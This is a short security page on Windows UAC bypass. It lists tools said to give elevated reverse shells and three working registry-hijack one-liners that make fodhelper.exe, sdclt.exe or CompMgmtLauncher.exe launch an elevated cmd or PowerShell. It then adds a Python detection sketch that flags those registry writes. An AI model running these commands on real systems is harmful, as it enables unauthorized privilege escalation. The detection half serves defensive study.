UAC Bypass

https://github.com/hfiref0x/UACME

TpmInitUACBypass: bypasses User Account Control (UAC) to get a High Integrity (or SYSTEM) reverse command shell, a reverse PowerShell session, or a reverse Meterpreter session.

[TpmInitUACAnniversaryBypass](https://github.com/Cn33liz/TpmInitUACAnniversaryBypass): same as above, but only works on Windows 10 x64 with the Anniversary Update applied (Version 1607).

UAC bypass for Win10 - control.exe

reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /d "cmd.exe" /f && START /W sdclt.exe && reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f

UAC bypass for Win10 - fodhelper.exe

reg add HKCU\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /f && reg add HKCU\Software\Classes\ms-settings\shell\open\command /d "cmd /c start powershell.exe" /f && START /W fodhelper.exe && reg delete HKCU\Software\Classes\ms-settings /f

UAC bypass for 7/8/10 - CompMgmtLauncher.exe

reg add HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command /d "cmd.exe" /f && START /W CompMgmtLauncher.exe && reg delete HKEY_CURRENT_USER\Software\Classes\mscfile /f
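All three one-liners above leave the same trace: a write to a per-user registry key followed by the start of an auto-elevating binary. The following detection sketch is an added example, not code from this page or from the linked projects; it flags those writes and marks them confirmed when the paired binary starts shortly after. The `time|kind|value` record format, the sample records and the 60-second window are assumptions made for the example.

```python
import re
from datetime import datetime, timedelta

# Only per-user hives count: the HKLM copies of these keys are legitimate.
USER_HIVE = re.compile(r"^(HKU|HKCU|HKEY_USERS|HKEY_CURRENT_USER)\\", re.I)
# HKCU\Software\Classes can appear as HKU\<SID>_Classes in registry telemetry.
CLASSES = r"(?:\\Software\\Classes|_Classes)"
# Key written by each one-liner on this page -> binary it then starts.
RULES = [
    (re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\control\.exe(?:\\|$)", re.I), "sdclt.exe"),
    (re.compile(CLASSES + r"\\ms-settings\\shell\\open\\command(?:\\|$)", re.I), "fodhelper.exe"),
    (re.compile(CLASSES + r"\\mscfile\\shell\\open\\command(?:\\|$)", re.I), "compmgmtlauncher.exe"),
]
WINDOW = timedelta(seconds=60)  # assumed correlation window

# Constructed sample records (hypothetical format: time|kind|value).
SAMPLE_LOG = r"""
2024-01-01T10:00:00|reg_set|HKU\S-1-5-21-1111-1001_Classes\ms-settings\shell\open\command\DelegateExecute
2024-01-01T10:00:01|reg_set|HKU\S-1-5-21-1111-1001_Classes\ms-settings\shell\open\command\(Default)
2024-01-01T10:00:02|proc_start|C:\Windows\System32\fodhelper.exe
2024-01-01T10:05:00|reg_set|HKLM\SOFTWARE\Classes\mscfile\shell\open\command\(Default)
2024-01-01T10:06:00|reg_set|HKU\S-1-5-21-1111-1001\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe\(Default)
2024-01-01T10:09:00|proc_start|C:\Windows\System32\sdclt.exe
"""

def parse(line):
    """Split one record into (datetime, kind, value)."""
    ts, kind, value = line.strip().split("|", 2)
    return datetime.fromisoformat(ts), kind, value

def detect(log_text):
    """Return (time, binary, confirmed) for every matching per-user key write."""
    events = sorted(parse(l) for l in log_text.splitlines() if l.strip())
    starts = [(ts, v.rsplit("\\", 1)[-1].lower()) for ts, k, v in events if k == "proc_start"]
    findings = []
    for ts, kind, key in events:
        if kind != "reg_set" or not USER_HIVE.match(key):
            continue
        for pattern, binary in RULES:
            if pattern.search(key):
                confirmed = any(b == binary and ts <= t <= ts + WINDOW for t, b in starts)
                findings.append((ts.isoformat(), binary, confirmed))
    return findings

if __name__ == "__main__":
    for finding in detect(SAMPLE_LOG):
        print(finding)
```

An unconfirmed finding is still worth triage: these keys are normally absent from the user hive, and the one-liners delete them again right after use.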